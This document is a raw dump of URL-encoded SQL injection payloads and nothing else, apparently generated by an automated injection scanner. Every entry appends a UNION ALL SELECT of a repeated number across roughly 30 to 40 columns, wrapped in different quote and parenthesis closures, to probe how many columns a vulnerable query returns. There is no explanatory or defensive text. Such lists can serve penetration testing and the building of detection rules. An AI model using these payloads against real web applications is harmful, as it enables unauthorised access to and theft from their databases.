-3546%29%29%20UNION%20ALL%20SELECT%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%2C%208585%23%20AND%20%28%284011%3D4011 -1505%29%29%20UNION%20ALL%20SELECT%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%2C%201611%23%20AND%20%28%288300%3D8300 -9871%29%29%20UNION%20ALL%20SELECT%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%23%20AND%20%28%281693%3D1693 -8474%29%29%20UNION%20ALL%20SELECT%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%23%20AND%20%28%284764%3D4764 -9537%29%29%20UNION%20ALL%20SELECT%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%2C%203629%23%20AND%20%28%285880%3D5880 -5231%29%29%20UNION%20ALL%20SELECT%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%23%20AND%20%28%281697%3D1697 -9061%29%29%29%20UNION%20ALL%20SELECT%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%2C%204884%23%20AND%20%28%28%288783%3D8783 -6688%29%29%29%20UNION%20ALL%20SELECT%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%23%20AND%20%28%28%289731%3D9731 -6863%29%29%29%20UNION%20ALL%20SELECT%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%23%20AND%20%28%28%288985%3D8985 -8394%29%29%29%20UNION%20ALL%20SELECT%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%2C%203988%23%20AND%20%28%28%288196%3D8196 -7720%29%29%29%20UNION%20ALL%20SELECT%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%23%20AND%20%28%28%287975%3D7975 -4588%29%29%29%20UNION%20ALL%20SELECT%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%23%20AND%20%28%28%287510%3D7510 -3366%29%29%29%20UNION%20ALL%20SELECT%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%23%20AND%20%28%28%286983%3D6983 -6855%29%29%29%20UNION%20ALL%20SELECT%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%23%20AND%20%28%28%289801%3D9801 -6429%29%29%29%20UNION%20ALL%20SELECT%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%2C%209124%23%20AND%20%28%28%289259%3D9259 -7947%29%29%29%20UNION%20ALL%20SELECT%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%23%20AND%20%28%28%284343%3D4343 -5161%20UNION%20ALL%20SELECT%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%23 -4390%20UNION%20ALL%20SELECT%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%2C%207326%23 -9933%20UNION%20ALL%20SELECT%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%2C%207495%23 -7346%20UNION%20ALL%20SELECT%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%2C%208731%23 -8860%20UNION%20ALL%20SELECT%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%23 -6777%20UNION%20ALL%20SELECT%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%23 -6953%20UNION%20ALL%20SELECT%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%23 -9648%20UNION%20ALL%20SELECT%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%2C%203512%23 -6961%20UNION%20ALL%20SELECT%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%2C%203862%23 -1334%20UNION%20ALL%20SELECT%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%23 -7529%27%29%20UNION%20ALL%20SELECT%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%23%20AND%20%28%27IEto%27%3D%27IEto -6906%27%29%20UNION%20ALL%20SELECT%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%23%20AND%20%28%27OMBy%27%3D%27OMBy -8805%27%29%20UNION%20ALL%20SELECT%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%23%20AND%20%28%27lrdD%27%3D%27lrdD -6392%27%29%20UNION%20ALL%20SELECT%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%2C%204996%23%20AND%20%28%27hLZi%27%3D%27hLZi -2137%27%29%20UNION%20ALL%20SELECT%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%2C%205589%23%20AND%20%28%27zonA%27%3D%27zonA -9795%27%29%20UNION%20ALL%20SELECT%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%2C%203495%23%20AND%20%28%27YovP%27%3D%27YovP -7111%27%29%20UNION%20ALL%20SELECT%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%23%20AND%20%28%27PQXK%27%3D%27PQXK -7302%27%29%20UNION%20ALL%20SELECT%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%23%20AND%20%28%27HRVi%27%3D%27HRVi -9163%27%29%20UNION%20ALL%20SELECT%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%2C%202934%23%20AND%20%28%27zUdn%27%3D%27zUdn -7148%27%29%20UNION%20ALL%20SELECT%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%23%20AND%20%28%27hEIj%27%3D%27hEIj -9211%27%29%29%20UNION%20ALL%20SELECT%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%23%20AND%20%28%28%27DOij%27%3D%27DOij -8275%27%29%29%20UNION%20ALL%20SELECT%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%23%20AND%20%28%28%27JuKV%27%3D%27JuKV -6998%27%29%29%20UNION%20ALL%20SELECT%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%2C%209861%23%20AND%20%28%28%27WWeC%27%3D%27WWeC -6170%27%29%29%20UNION%20ALL%20SELECT%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%23%20AND%20%28%28%27Ndfj%27%3D%27Ndfj -4790%27%29%29%20UNION%20ALL%20SELECT%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%23%20AND%20%28%28%27aSkP%27%3D%27aSkP -1867%27%29%29%20UNION%20ALL%20SELECT%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%23%20AND%20%28%28%27OrFh%27%3D%27OrFh -2824%27%29%29%20UNION%20ALL%20SELECT%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%2C%208549%23%20AND%20%28%28%27tJbE%27%3D%27tJbE -1110%27%29%29%20UNION%20ALL%20SELECT%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%23%20AND%20%28%28%27gEIj%27%3D%27gEIj -1579%27%29%29%20UNION%20ALL%20SELECT%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%2C%205466%23%20AND%20%28%28%27wECk%27%3D%27wECk -5016%27%29%29%20UNION%20ALL%20SELECT%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%2C%208934%23%20AND%20%28%28%27BkPz%27%3D%27BkPz -3964%27%29%29%29%20UNION%20ALL%20SELECT%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%2C%209655%23%20AND%20%28%28%28%27iOYx%27%3D%27iOYx -6477%27%29%29%29%20UNION%20ALL%20SELECT%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%2C%207075%23%20AND%20%28%28%28%27UlVo%27%3D%27UlVo -5228%27%29%29%29%20UNION%20ALL%20SELECT%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%2C%201338%23%20AND%20%28%28%28%27zeyB%27%3D%27zeyB -1881%27%29%29%29%20UNION%20ALL%20SELECT%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%23%20AND%20%28%28%28%27aTKV%27%3D%27aTKV -7025%27%29%29%29%20UNION%20ALL%20SELECT%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%23%20AND%20%28%28%28%27aAuP%27%3D%27aAuP -4937%27%29%29%29%20UNION%20ALL%20SELECT%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%2C%209240%23%20AND%20%28%28%28%27dCju%27%3D%27dCju -9815%27%29%29%29%20UNION%20ALL%20SELECT%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%23%20AND%20%28%28%28%27jSJq%27%3D%27jSJq -1037%27%29%29%29%20UNION%20ALL%20SELECT%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%23%20AND%20%28%28%28%27XeBQ%27%3D%27XeBQ -4810%27%29%29%29%20UNION%20ALL%20SELECT%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%2C%204962%23%20AND%20%28%28%28%27deip%27%3D%27deip -6459%27%29%29%29%20UNION%20ALL%20SELECT%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%23%20AND%20%28%28%28%27jFgp%27%3D%27jFgp -2330%27%20UNION%20ALL%20SELECT%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%23%20AND%20%27KBAn%27%3D%27KBAn -9487%27%20UNION%20ALL%20SELECT%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%2C%208225%23%20AND%20%27VxBf%27%3D%27VxBf 